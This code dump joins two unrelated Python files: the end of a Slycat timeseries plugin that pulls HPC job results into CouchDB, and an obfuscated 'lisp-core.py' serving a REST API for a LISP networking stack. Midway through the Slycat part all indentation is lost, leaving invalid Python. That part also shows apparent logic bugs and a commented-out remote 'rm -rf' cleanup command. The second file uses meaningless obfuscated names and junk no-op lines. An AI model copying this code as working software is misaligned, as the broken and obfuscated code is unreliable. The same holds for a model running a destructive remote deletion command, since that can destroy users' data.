            # (also converts numpy scalars/arrays so json can serialize them)
            class MyEncoder(json.JSONEncoder):
                def default(self, obj):
                    if isinstance(obj, numpy.integer):
                        return int(obj)
                    elif isinstance(obj, numpy.floating):
                        return float(obj)
                    elif isinstance(obj, numpy.ndarray):
                        return obj.tolist()
                    elif type(obj) is bytes:
                        return str(obj.decode())
                    else:
                        return super(MyEncoder, self).default(obj)
            # round-trip through JSON to normalize all values to plain types
            inputs = json.loads(json.dumps(inputs, cls=MyEncoder))
            slycat.web.server.put_model_arrayset(database, model, inputs["aid"])
            # load attributes
            slycat.web.server.update_model(database, model, progress=55, message="loading attributes")
            attributes = inputs["attributes"]
            slycat.web.server.put_model_array(database, model, inputs["aid"], 0, attributes, inputs["dimensions"])
            # load attribute data
            data = helpGetFile("%sinputs_attributes_data.pickle" % (pickle_path),
                               use_tar, hostname, model, total_file_delta_time, calling_client, input_tar)
            attributes_data = pickle.loads(data)
            # push attribute arraysets
            # TODO this can become multi processored
            for attribute in range(len(attributes)):
                # re-read the model each iteration to avoid stale revisions
                model = database.get("model", model["_id"])
                slycat.web.server.put_model_arrayset_data(database, model, inputs["aid"], "0/%s/..." % attribute,
                                                          [attributes_data[attribute]])
            # load clusters data
            slycat.web.server.update_model(database, model, progress=60, message="loading cluster data")
            clusters = helpGetFile("%sfile_clusters.json" % (pickle_path),
                                   use_tar, hostname, model, total_file_delta_time, calling_client, input_tar)
            clusters = json.loads(clusters)
            # "file" and "timeseries_count" are themselves JSON-encoded strings
            clusters_file = json.JSONDecoder().decode(clusters["file"])
            timeseries_count = json.JSONDecoder().decode(clusters["timeseries_count"])
            slycat.web.server.post_model_file(model["_id"], True, sid,
                                              "%s/slycat_timeseries_%s/file_clusters.out" % (workdir, uid),
                                              clusters["aid"], clusters["parser"], client=calling_client)
            # TODO this can become multi processored
            cherrypy.log.error("Pulling timeseries computed data")
            slycat.web.server.update_model(database, model, progress=65, message="Pulling timeseries computed data for %s cluster files" % len(clusters_file))
            # progress advances from 65 to 95 across the cluster files
            progress = 65
            progress_part = 30/len(clusters_file)
            for file_name in clusters_file:
                progress = progress + progress_part
                slycat.web.server.update_model(database, model, progress=progress, message="loading %s cluster file" % file_name)
                file_cluster_data = helpGetFile("%sfile_cluster_%s.json" % (pickle_path, file_name),
                                                use_tar, hostname, model, total_file_delta_time, calling_client, input_tar)
                file_cluster_attr = json.loads(file_cluster_data)
                slycat.web.server.post_model_file(model["_id"], True, sid,
                                                  "%s/slycat_timeseries_%s/file_cluster_%s.out" % (
                                                      workdir, uid, file_name),
                                                  file_cluster_attr["aid"], file_cluster_attr["parser"], client=calling_client)
                database = slycat.web.server.database.couchdb.connect()
                model = database.get("model", model["_id"])
                slycat.web.server.put_model_arrayset(database, model, "preview-%s" % file_name)
                # waveform previews: dimensions, attributes, times and values
                # arrive as separate pickles per cluster file
                waveform_dimensions_data = helpGetFile("%swaveform_%s_dimensions.pickle" % (pickle_path, file_name),
                                                       use_tar, hostname, model, total_file_delta_time, calling_client, input_tar)
                waveform_dimensions_array = pickle.loads(waveform_dimensions_data)
                waveform_attributes_data = helpGetFile("%swaveform_%s_attributes.pickle" % (pickle_path, file_name),
                                                       use_tar, hostname, model, total_file_delta_time, calling_client, input_tar)
                waveform_attributes_array = pickle.loads(waveform_attributes_data)
                waveform_times_data = helpGetFile("%swaveform_%s_times.pickle" % (pickle_path, file_name),
                                                  use_tar, hostname, model, total_file_delta_time, calling_client, input_tar)
                waveform_times_array = pickle.loads(waveform_times_data)
                waveform_values_data = helpGetFile("%swaveform_%s_values.pickle" % (pickle_path, file_name),
                                                   use_tar, hostname, model, total_file_delta_time, calling_client, input_tar)
                waveform_values_array = pickle.loads(waveform_values_data)
                for index in range(int(timeseries_count)):
                    try:
                        model = database.get("model", model["_id"])
                        slycat.web.server.put_model_array(database, model, "preview-%s" % file_name, index,
                                                          waveform_attributes_array[index],
                                                          waveform_dimensions_array[index])
                        model = database.get("model", model["_id"])
                        slycat.web.server.put_model_arrayset_data(database, model, "preview-%s" % file_name,
                                                                  "%s/0/...;%s/1/..." % (index, index),
                                                                  [waveform_times_array[index],
                                                                   waveform_values_array[index]])
                    except:
                        # best-effort: a bad waveform is logged and skipped
                        cherrypy.log.error("failed on index: %s" % index)
                        pass
            if input_tar:
                input_tar.close()
            database = slycat.web.server.database.couchdb.connect()
            model = database.get("model", model_id)
            slycat.web.server.update_model(database, model, message="finished loading all data")
            slycat.web.server.put_model_parameter(database, model, "computing", False)
            cherrypy.log.error("finished Pulling timeseries computed data")
            finish_time = time.time()
            file_stats = {
                "min": min(total_file_delta_time),
                "max": max(total_file_delta_time),
                "mean": statistics.mean(total_file_delta_time),
                "median": statistics.median(total_file_delta_time),
                "number_of_files_pulled": len(total_file_delta_time),
                "total_time_Pulling_data": sum(total_file_delta_time),
                "total_time": (finish_time - start_time)
            }
            cherrypy.log.error("File Stats %s" % str(file_stats))
            total_file_delta_time = []
            finish(model["_id"])
            stop_event.set()
            # TODO add finished to the model state
            # TODO add remove dir command by uncommenting below
            # payload = {
            #     "action": "run_remote_command",
            #     "command": ("rm -rf %s" % workdir_raw)
            # }
        except cherrypy._cperror.HTTPError as e:
            # HTTP errors (e.g. lost ssh session via get_sid): release the
            # computing flag so pull_data can be retried
            database = slycat.web.server.database.couchdb.connect()
            model = database.get("model", model_id)
            slycat.web.server.put_model_parameter(database, model, "computing", False)
            cherrypy.log.error(traceback.format_exc())
            cherrypy.log.error("Timeseries cperror model compute exception type: %s" % sys.exc_info()[0])
            cherrypy.log.error("Timeseries model compute exception value: %s" % sys.exc_info()[1])
            cherrypy.log.error("Timeseries model compute exception traceback: %s" % sys.exc_info()[2])
            stop_event.set()
        except:
            database = slycat.web.server.database.couchdb.connect()
            model = database.get("model", model_id)
            slycat.web.server.put_model_parameter(database, model, "computing", False)
            cherrypy.log.error(traceback.format_exc())
            cherrypy.log.error("Timeseries model compute exception type: %s" % sys.exc_info()[0])
            cherrypy.log.error("Timeseries model compute exception value: %s" % sys.exc_info()[1])
            cherrypy.log.error("Timeseries model compute exception traceback: %s" % sys.exc_info()[2])
            stop_event.set()
        # Pull the slurm log and record compute/pull timings on the model.
        # NOTE(review): this runs after the try/except above; if an
        # exception was handled, names such as finish_time/hostname may be
        # unbound here and raise NameError inside the worker thread —
        # confirm whether this tail was meant for the success path only.
        file = get_remote_file_server(hostname, model, "/home/%s/slurm-%s.out" % (username, model["artifact:jid"]),
                                      total_file_delta_time,
                                      calling_client)
        pulling_time = finish_time - start_time
        # the agent script brackets its timings with [START]/[FINISH]/[RUN TIME]
        compute_start_time = file.decode('utf-8').split('[START]')
        compute_finish_time = file.decode('utf-8').split('[FINISH]')
        compute_run_time = file.decode('utf-8').split('[RUN TIME]')
        database = slycat.web.server.database.couchdb.connect()
        model = database.get("model", model_id)
        model["model_delta_time"] = str(compute_run_time[1].split('\n')[0])
        model["pulling_time"] = pulling_time
        with slycat.web.server.get_model_lock(model["_id"]):
            database.save(model)
def get_job_status(hostname, jid):
"""
returns the job status of a running timeseries job from the cluster called from a thread
:param tries: number of tries left to use this function
:param mid: model id
:param sid: session id for ssh
:param jid: job id for hpc
:param stop_event: thread stop event
:return:
"""
try:
response = slycat.web.server.handlers.get_checkjob(hostname, jid)
except Exception as e:
cherrypy.log.error("Something went wrong while checking on job %s status %s check ssh session" % (jid,str(e)))
return {"status": {"state": "ERROR"}}
return response
def update_remote_job(mid, jid, hostname, calling_client):
"""
Routine that checks on the status of remote
jobs running on a SLURM infrastructure.
:param mid: model ID
:param sid: session ID
:param jid: job ID
:param request_from:
:param stop_event: event stopping the thread when the job completes
:param callback: callback methods when the job successfully completes
"""
# get the status of the job
cherrypy.log.error("[Timeseries] Getting job status")
state = get_job_status(hostname, jid)["status"]["state"]
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", mid)
if state == 'ERROR':
slycat.web.server.update_model(database, model, progress=0, message="Error")
slycat.web.server.put_model_parameter(database, model, "computing", False)
raise cherrypy.HTTPError("409 error connecting to check on the job")
cherrypy.log.error("[Timeseries] checkjob %s returned with status %s" % (jid, state))
if state in ["RUNNING", "PENDING"]:
if state == "RUNNING":
slycat.web.server.update_model(database, model, progress=10, message="Job is in pending state")
else:
slycat.web.server.update_model(database, model, progress=5, message="Job is in pending state")
slycat.web.server.put_model_parameter(database, model, "computing", False)
if "job_running_time" not in model and state == "RUNNING":
model = database.get("model", model["_id"])
model["job_running_time"] = datetime.datetime.utcnow().isoformat()
with slycat.web.server.get_model_lock(model["_id"]):
database.save(model)
if state in ["CANCELLED", "REMOVED", "VACATED"]:
slycat.web.server.put_model_parameter(database, model, "computing", False)
fail_model(mid, "Job %s was cancelled. Exit code %s" % (jid, state))
if state == "COMPLETED":
slycat.web.server.update_model(database, model, progress=50, message="Job is in Completed state")
if "job_running_time" not in model:
model = database.get("model", model["_id"])
model["job_running_time"] = datetime.datetime.utcnow().isoformat()
with slycat.web.server.get_model_lock(model["_id"]):
database.save(model)
if "job_completed_time" not in model:
model = database.get("model", model["_id"])
model["job_completed_time"] = datetime.datetime.utcnow().isoformat()
with slycat.web.server.get_model_lock(model["_id"]):
database.save(model)
"""
Callback for a successful remote job completion. It computes the model
and successfully completes it.
"""
cherrypy.log.error("calling compute")
# now start thread to prevent timing out on large files
stop_event = threading.Event()
# compute(model["_id"], stop_event, calling_client)
thread = threading.Thread(target=compute, args=(model["_id"], stop_event, calling_client))
thread_pool[model["_id"]] = thread
thread_pool[model["_id"]].start()
if state == ["FAILED", "UNKNOWN", "NOTQUEUED"]:
cherrypy.log.error("Something went wrong with job %s job state:" % (jid, state))
slycat.web.server.update_model(database, model, message="Job %s had returned a bad or unknown state from the hpc system" % jid)
slycat.web.server.put_model_parameter(database, model, "computing", False)
def update_model_info(database, model, verb, type, command, **kwargs):
"""
Starts a routine to continuously check the status of a remote job.
:param database:
:param model:
:param kwargs: arguments contain hostname, username, jid,
function name and parameters, UID
"""
slycat.web.server.update_model(database, model, progress=1, message="Job has been sent to slurm")
model_params = {
"working_directory": kwargs["working_directory"],
"username": kwargs["username"],
"hostname": kwargs["hostname"],
"pickle_uid": kwargs["uid"],
"jid": kwargs["jid"],
"fn": kwargs["fn"],
"fn_params": kwargs["fn_params"],
"job_submit_time": datetime.datetime.utcnow().isoformat()
}
for key, value in model_params.items():
slycat.web.server.put_model_parameter(database, model, key, value, input=False)
def pull_data(database, model, verb, type, command, **kwargs):
"""
check if a data pull is allowed
:param mid: model id
:return:
"""
calling_client = cherrypy.request.headers.get("x-forwarded-for")
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model["_id"])
try:
cherrypy.log.error("computing model value:" + str(slycat.web.server.get_model_parameter(database, model, "computing")))
if model["_id"] in thread_pool:
if thread_pool[model["_id"]].is_alive():
cherrypy.log.error("computing thread is alive for model %s"%str(model["_id"]))
else:
cherrypy.log.error("computing thread is dead for model %s setting compute to false"%str(model["_id"]))
del thread_pool[model["_id"]]
slycat.web.server.put_model_parameter(database, model, "computing", False)
else:
slycat.web.server.put_model_parameter(database, model, "computing", False)
except KeyError:
slycat.web.server.put_model_parameter(database, model, "computing", False)
model = database.get("model", model["_id"])
if model["state"] == "finished":
raise cherrypy.HTTPError("409 model is in the finished state already")
if not slycat.web.server.get_model_parameter(database, model, "computing"):
slycat.web.server.put_model_parameter(database, model, "computing", True)
update_remote_job(model["_id"], model["artifact:jid"], model["artifact:hostname"], calling_client)
cherrypy.response.headers["content-type"] = "application/json"
return json.dumps({'status': 'computing'})
else:
raise cherrypy.HTTPError("409 compute is currently still running.")
# Register our new model type
context.register_model("timeseries", finish)
# Register custom commands for use by wizards
context.register_model_command("GET", "timeseries", "pull_data", pull_data)
context.register_model_command("POST", "timeseries", "update-model-info", update_model_info)
context.register_model_command("GET", "timeseries", "media-columns", media_columns)
# Register a wizard for creating instances of the new model
context.register_wizard("timeseries", "New Timeseries Model", require={"action": "create", "context": "project"})
|
lisp-core.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
from __future__ import division
from future import standard_library
standard_library . install_aliases ( )
from builtins import str
from past . utils import old_div
import lisp
import lispconfig
import multiprocessing
import threading
from subprocess import getoutput
import time
import os
import bottle
import json
import sys
import socket
if 64 - 64: i11iIiiIii
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
from cheroot . wsgi import Server as wsgi_server
from cheroot . ssl . builtin import BuiltinSSLAdapter as ssl_adaptor
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
# NOTE(review): this file is machine-obfuscated; the "if N - N:" lines are
# always-false no-ops inserted by the obfuscator and have no runtime effect.
o0oO0 = ""
if 100 - 100: i1IIi
# Module-level handles, populated during startup. `Ooo` is later passed as
# the IPC socket argument to lisp.lisp_ipc(); the roles of the others
# cannot be confirmed from this chunk.
I1Ii11I1Ii1i = None
Ooo = None
o0oOoO00o = None
i1 = [ None , None , None ]
oOOoo00O0O = None
if 15 - 15: I1IiiI
if 90 - 90: IiII * i1IIi / Ii1I . OoO0O00 * oO0o
if 16 - 16: ooOoO0o * IiII % I11i . I1Ii111 / IiII % iII111i
if 27 - 27: IiII . i1IIi * OoOoOO00 % Ii1I / i1IIi
if 3 - 3: IiII / ooOoO0o
if 28 - 28: ooOoO0o + I1Ii111 - ooOoO0o . OoooooooOO
if 97 - 97: OoO0O00 . I11i
if 32 - 32: Oo0Ooo - II111iiii - i11iIiiIii % I1Ii111
# Obfuscated name: GET handler for the /lisp/api REST endpoints.
@ bottle . route ( '/lisp/api' , method = "get" )
@ bottle . route ( '/lisp/api/<command>' , method = "get" )
@ bottle . route ( '/lisp/api/<command>/<data_structure>' , method = "get" )
def O0OoOoo00o ( command = "" , data_structure = "" ) :
    """Serve GET /lisp/api requests.

    After authenticating (HTTP basic auth via lispconfig user accounts,
    or an interactive browser session), returns JSON: either a runtime
    data structure (when command == "data") or the configuration clause
    for the requested command.
    """
    # default error payload returned whenever authentication fails
    iiiI11 = [ { "?" : [ { "?" : "not-auth" } ] } ]
    if 91 - 91: o0oOOo0O0Ooo / II111iiii . I1ii11iIi11i + OOooOOo
    if 47 - 47: OoOoOO00 / Ii1I * OoooooooOO
    if 9 - 9: I1IiiI - Ii1I % i1IIi % OoooooooOO
    if 3 - 3: iII111i + O0
    if ( bottle . request . auth != None ) :
        # basic-auth credentials supplied: check the user account
        I1Ii , o0oOo0Ooo0O = bottle . request . auth
        if ( lispconfig . lisp_find_user_account ( I1Ii , o0oOo0Ooo0O ) == False ) :
            return ( json . dumps ( iiiI11 ) )
        if 81 - 81: I1ii11iIi11i * IiII * I11i - iII111i - o0oOOo0O0Ooo
    else :
        # no basic-auth: reject scripted (python User-Agent) clients,
        # otherwise fall back to interactive user validation
        if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
            return ( json . dumps ( iiiI11 ) )
        if 90 - 90: II111iiii + oO0o / o0oOOo0O0Ooo % II111iiii - O0
        if ( lispconfig . lisp_validate_user ( ) == False ) :
            return ( json . dumps ( iiiI11 ) )
        if 29 - 29: o0oOOo0O0Ooo / iIii1I11I1II1
    if 24 - 24: O0 % o0oOOo0O0Ooo + i1IIi + I1Ii111 + I1ii11iIi11i
    if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
    if 23 - 23: i11iIiiIii + I1IiiI
    if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
    if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
    if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
    # /lisp/api/data/<name>: return the named runtime data structure; an
    # optional JSON request body supplies filter parameters
    if ( command == "data" and data_structure != "" ) :
        O00oooo0O = bottle . request . body . readline ( )
        if ( type ( O00oooo0O ) == bytes ) : O00oooo0O = O00oooo0O . decode ( )
        iiiI11 = json . loads ( O00oooo0O ) if O00oooo0O != "" else ""
        if ( iiiI11 != "" ) : iiiI11 = list ( iiiI11 . values ( ) ) [ 0 ]
        if ( iiiI11 == [ ] ) : iiiI11 = ""
        if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
        # unwrap one more level when the body is a nested dict
        if ( type ( iiiI11 ) == dict and type ( list ( iiiI11 . values ( ) ) [ 0 ] ) == dict ) :
            iiiI11 = list ( iiiI11 . values ( ) ) [ 0 ]
        if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
        if 61 - 61: ooOoO0o
        iiiI11 = oOOO00o ( data_structure , iiiI11 )
        return ( iiiI11 )
    if 97 - 97: I11i % I11i + II111iiii * iII111i
    if 54 - 54: I11i + IiII / iII111i
    if 9 - 9: OoOoOO00 / Oo0Ooo - IiII . i1IIi / I1IiiI % IiII
    if 71 - 71: I1Ii111 . O0
    if 73 - 73: OOooOOo % OoOoOO00 - Ii1I
    # otherwise resolve the command name: from the URL, or from the single
    # top-level key of the JSON request body
    if ( command != "" ) :
        command = "lisp " + command
    else :
        O00oooo0O = bottle . request . body . readline ( )
        if ( type ( O00oooo0O ) == bytes ) : O00oooo0O = O00oooo0O . decode ( )
        if ( O00oooo0O == "" ) :
            iiiI11 = [ { "?" : [ { "?" : "no-body" } ] } ]
            return ( json . dumps ( iiiI11 ) )
        if 10 - 10: I1IiiI % I1ii11iIi11i
        if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
        iiiI11 = json . loads ( O00oooo0O )
        command = list ( iiiI11 . keys ( ) ) [ 0 ]
        if 20 - 20: o0oOOo0O0Ooo
    if 77 - 77: OoOoOO00 / I11i
    iiiI11 = lispconfig . lisp_get_clause_for_api ( command )
    return ( json . dumps ( iiiI11 ) )
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
def I1II1III11iii ( ) :
    """Build the JSON "system" status blob (obfuscated name; served via
    the "system" data structure of the REST API): hostname, system and
    LISP uptime, LISP version, whether a crash traceback log exists,
    and the two local RLOC addresses."""
    iiiI11 = { }
    iiiI11 [ "hostname" ] = socket . gethostname ( )
    iiiI11 [ "system-uptime" ] = getoutput ( "uptime" )
    iiiI11 [ "lisp-uptime" ] = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
    iiiI11 [ "lisp-version" ] = lisp . lisp_version
    if 75 - 75: iIii1I11I1II1 / OOooOOo % o0oOOo0O0Ooo * OoOoOO00
    # flag whether a crash traceback has been written to disk
    iiii11I = "yes" if os . path . exists ( "./logs/lisp-traceback.log" ) else "no"
    iiiI11 [ "traceback-log" ] = iiii11I
    if 96 - 96: II111iiii % Ii1I . OOooOOo + OoooooooOO * oO0o - OoOoOO00
    # the two entries of lisp_myrlocs; either may be absent ("none").
    # NOTE(review): presumably [IPv4, IPv6] — confirm against lisp.py.
    i11i1 = lisp . lisp_myrlocs [ 0 ]
    IIIii1II1II = lisp . lisp_myrlocs [ 1 ]
    i11i1 = "none" if ( i11i1 == None ) else i11i1 . print_address_no_iid ( )
    IIIii1II1II = "none" if ( IIIii1II1II == None ) else IIIii1II1II . print_address_no_iid ( )
    iiiI11 [ "lisp-rlocs" ] = [ i11i1 , IIIii1II1II ]
    return ( json . dumps ( iiiI11 ) )
if 42 - 42: Ii1I + oO0o
if 76 - 76: I1Ii111 - OoO0O00
if 70 - 70: ooOoO0o
if 61 - 61: I1ii11iIi11i . I1ii11iIi11i
if 10 - 10: OoOoOO00 * iII111i . I11i + II111iiii - ooOoO0o * i1IIi
if 56 - 56: o0oOOo0O0Ooo * IiII * II111iiii
if 80 - 80: o0oOOo0O0Ooo * II111iiii % II111iiii
if 59 - 59: iIii1I11I1II1 + I1IiiI - o0oOOo0O0Ooo - I1IiiI + OOooOOo / I1ii11iIi11i
if 24 - 24: I11i . iII111i % OOooOOo + ooOoO0o % OoOoOO00
if 4 - 4: IiII - OoO0O00 * OoOoOO00 - I11i
if 41 - 41: OoOoOO00 . I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
if 26 - 26: iII111i
def oOOO00o(data_structure, data):
    '''Return a JSON string for a named LISP data-structure.

    data_structure -- one of the names in the valid list below. "system"
        is answered locally; all others are requested over IPC from
        whichever LISP component process (RTR/ITR/ETR/MS) owns the table.
    data -- optional request parameters; JSON-encoded when non-empty.

    Returns "[]" when the name is unknown or no owning process is running.
    '''
    valid = ["site-cache", "map-cache", "system", "map-resolver",
        "map-server", "database-mapping", "site-cache-summary"]

    if (data_structure not in valid): return(json.dumps([]))

    # The "system" summary needs no IPC round-trip.
    if (data_structure == "system"): return(I1II1III11iii())

    if (data != ""): data = json.dumps(data)
    ipc = lisp.lisp_api_ipc("lisp-core", data_structure + "%" + data)

    # Route the request to the owning process. The IPC lock is acquired
    # here and released only after the reply is received below.
    if (data_structure in ["map-cache", "map-resolver"]):
        if (lisp.lisp_is_running("lisp-rtr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(ipc, Ooo, "lisp-rtr")
        elif (lisp.lisp_is_running("lisp-itr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(ipc, Ooo, "lisp-itr")
        else:
            return(json.dumps([]))

    if (data_structure in ["map-server", "database-mapping"]):
        if (lisp.lisp_is_running("lisp-etr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(ipc, Ooo, "lisp-etr")
        elif (lisp.lisp_is_running("lisp-itr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(ipc, Ooo, "lisp-itr")
        else:
            return(json.dumps([]))

    if (data_structure in ["site-cache", "site-cache-summary"]):
        if (lisp.lisp_is_running("lisp-ms")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(ipc, Ooo, "lisp-ms")
        else:
            return(json.dumps([]))

    # Bug fix: corrected typo "parmameters" -> "parameters" in log message.
    lisp.lprint("Waiting for api get-data '{}', parameters: '{}'".format(
        data_structure, data))

    opcode, source, port, reply = lisp.lisp_receive(Ooo, True)
    lisp.lisp_ipc_lock.release()
    return(reply)
if 93 - 93: iII111i
if 10 - 10: I11i
if 82 - 82: I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
@bottle.route('/lisp/api', method="put")
@bottle.route('/lisp/api/<command>', method="put")
@bottle.route('/lisp/api/<command>', method="delete")
def oOo(command=""):
    '''REST handler to add/replace (PUT) or remove (DELETE) a config clause.

    Always returns a JSON string; error results have the form
    [{<command>: [{"?": <reason>}]}].
    '''
    result = [{"?": [{"?": "not-auth"}]}]

    # Bug fix: this path previously returned the raw list while every other
    # path returns a JSON string; encode it consistently.
    if (bottle.request.auth == None): return(json.dumps(result))

    # Validate credentials from the HTTP auth header.
    if (bottle.request.auth != None):
        I1Ii, password = bottle.request.auth
        if (lispconfig.lisp_find_user_account(I1Ii, password) == False):
            return(json.dumps(result))
    else:
        # NOTE(review): unreachable after the auth==None return above;
        # retained for fidelity with the original control flow.
        if (bottle.request.headers["User-Agent"].find("python") != -1):
            return(json.dumps(result))
        if (lispconfig.lisp_validate_user() == False):
            return(json.dumps(result))

    # User-account changes require superuser privileges.
    if (command == "user-account"):
        if (lispconfig.lisp_is_user_superuser(I1Ii) == False):
            result = [{"user-account": [{"?": "not-auth"}]}]
            return(json.dumps(result))

    body = bottle.request.body.readline()
    if (type(body) == bytes): body = body.decode()
    if (body == ""):
        result = [{"?": [{"?": "no-body"}]}]
        return(json.dumps(result))

    result = json.loads(body)
    if (command != ""):
        command = "lisp " + command
    else:
        # No URL command: take the clause name from the request body.
        command = list(result[0].keys())[0]

    # Serialize configuration changes with other users of the IPC lock.
    lisp.lisp_ipc_lock.acquire()
    if (bottle.request.method == "DELETE"):
        result = lispconfig.lisp_remove_clause_for_api(result)
    else:
        result = lispconfig.lisp_put_clause_for_api(result)
    lisp.lisp_ipc_lock.release()
    return(json.dumps(result))
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
@bottle.route('/lisp/show/api-doc', method="get")
def o0O():
    '''Regenerate the lispapi documentation with pydoc and serve it.'''
    if os.path.exists("lispapi.py"):
        os.system("pydoc lispapi > lispapi.txt")
    if not os.path.exists("lispapi.txt"):
        return("lispapi.txt file not found")
    return(bottle.static_file("lispapi.txt", root="./"))
if 9 - 9: o0oOOo0O0Ooo . ooOoO0o - Oo0Ooo - oO0o + II111iiii * i11iIiiIii
if 79 - 79: oO0o % I11i % I1IiiI
if 5 - 5: OoooooooOO % OoOoOO00 % oO0o % iII111i
if 7 - 7: II111iiii + OoooooooOO . I1Ii111 . ooOoO0o - o0oOOo0O0Ooo
if 26 - 26: Oo0Ooo / IiII % iIii1I11I1II1 / IiII + I11i
@bottle.route('/lisp/show/command-doc', method="get")
def oOO0O00oO0Ooo():
    '''Serve the example configuration file as plain text.'''
    return(bottle.static_file("lisp.config.example", root="./",
        mimetype="text/plain"))
if 67 - 67: OoO0O00 - OOooOOo
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
@bottle.route('/lisp/show/lisp-xtr', method="get")
def Ii1I1Ii():
    '''Render the xTR "show" output file as HTML for the web UI.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    # Prefer the ztr output file when present, else the xtr one.
    path = "./show-ztr" if os.path.exists("./show-ztr") else "./show-xtr"
    handle = open(path, "r")
    contents = handle.read()
    handle.close()

    html = ""
    for line in contents.split("\n"):
        # Convert leading spaces into HTML spacing. NOTE(review): a line
        # starting with 4 spaces matches both tests and gets 6 spaces of
        # HTML indent — preserved from the original behavior.
        if (line[0:4] == "    "): html += lisp.lisp_space(4)
        if (line[0:2] == "  "): html += lisp.lisp_space(2)
        html += line + "<br>"

    html = lisp.convert_font(html)
    return(lisp.lisp_print_sans(html))
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
@bottle.route('/lisp/show/<xtr>/keys', method="get")
def OOoOO0o0o0(xtr):
    '''Show crypto keys for the given component ("itr"/"etr"/"rtr");
    superuser only.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    if (lispconfig.lisp_is_user_superuser(None) == False):
        note = "Permission denied"
